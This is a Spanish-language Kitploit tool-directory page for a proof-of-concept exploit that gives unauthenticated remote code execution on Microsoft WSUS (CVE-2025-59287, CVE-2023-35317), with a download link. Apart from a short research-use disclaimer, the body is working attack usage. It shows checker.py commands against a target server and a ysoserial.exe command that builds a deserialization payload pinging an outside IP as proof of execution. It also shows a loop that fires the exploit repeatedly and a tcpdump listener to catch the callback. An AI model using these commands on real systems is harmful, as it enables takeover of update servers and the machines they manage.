Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287-PoC — PoC de RCE no autenticada en Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317 | Kitploit
Herramientas/GitHubGitHub/m507/cve-2025-59287-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

PoC de RCE no autenticada en Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317

Ver Repositorio
1431hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59287 / CVE-2023-35317 PoC

Dentro de CVE-2025-59287: SoapFormatter RCE en WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/

Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto donde se autorice explícitamente. Los mantenedores del proyecto no son responsables ni se les puede exigir responsabilidad por el mal uso del software. Úselo de manera responsable.

Uso

Indicadores obligatorios:

  • --target-url – URL base del servidor WSUS objetivo, ej. http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – Uno de CVE-2023-35317 o CVE-2025-59287

Indicadores opcionales:

  • --dns-name – Nombre DNS del cliente utilizado en las solicitudes SOAP (por defecto: )
bugcrowd.local
  • --random – Anteponer a --dns-name un subdominio aleatorio para que cada ejecución aparezca como un nuevo cliente
  • --payload – Carga útil personalizada codificada en base64 de ysoserial; si se omite, se utiliza una carga útil incorporada para el --cve seleccionado
  • --debug – Habilitar registro de depuración detallado (líneas [DEBUG])
  • CVE-2025-59287

    1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

    texto alternativo

    Disparo manual – CVE-2023-35317

    1. (Opcional) Genere una carga útil usando Ysoserial.Net si no desea usar la incorporada (o confíe en la carga útil incorporada).
    2. Ejecute: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
    3. Abra la consola de WSUS

    texto alternativo

    Disparo automático – CVE-2023-35317

    1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (o confíe en la carga útil incorporada para --cve CVE-2023-35317)
    2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
    3. Espere de 1 a 3 minutos y aparecerá bajo el proceso del servicio.
    4. Monitoree las conexiones ICMP: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

    texto alternativo

    Descargar herramienta